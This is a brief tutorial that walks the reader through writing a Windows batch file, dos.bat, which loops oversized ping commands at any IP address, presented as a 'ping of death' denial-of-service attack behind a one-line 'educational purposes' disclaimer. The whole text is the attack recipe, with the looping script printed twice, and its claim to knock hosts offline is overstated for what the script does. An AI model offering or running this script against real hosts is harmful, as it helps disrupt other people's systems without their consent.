A simple tutorial on how to perform DoS attack using ping of death using CMD:
Disclaimer: This is just for educational purposes. It’s nothing great but you can use it to learn.
Here are the steps:
Step 1 :- Open Notepad
Step 2 :- Copy the following text on the notepad
:loop
ping <IP Address> -l 65500 -w 1 -n 1
goto :loop
:loop
ping <IP Address> -l 65500 -w 1 -n 1
goto :loop
Step 3 :- In the above command, replace <IP Address> with an IP address.
Step 4 :- Save the Notepad with any name. Let’s say dos.bat
So, now the file name should be dos.bat
Double click on it and you will see a command prompt running with a lot of pings.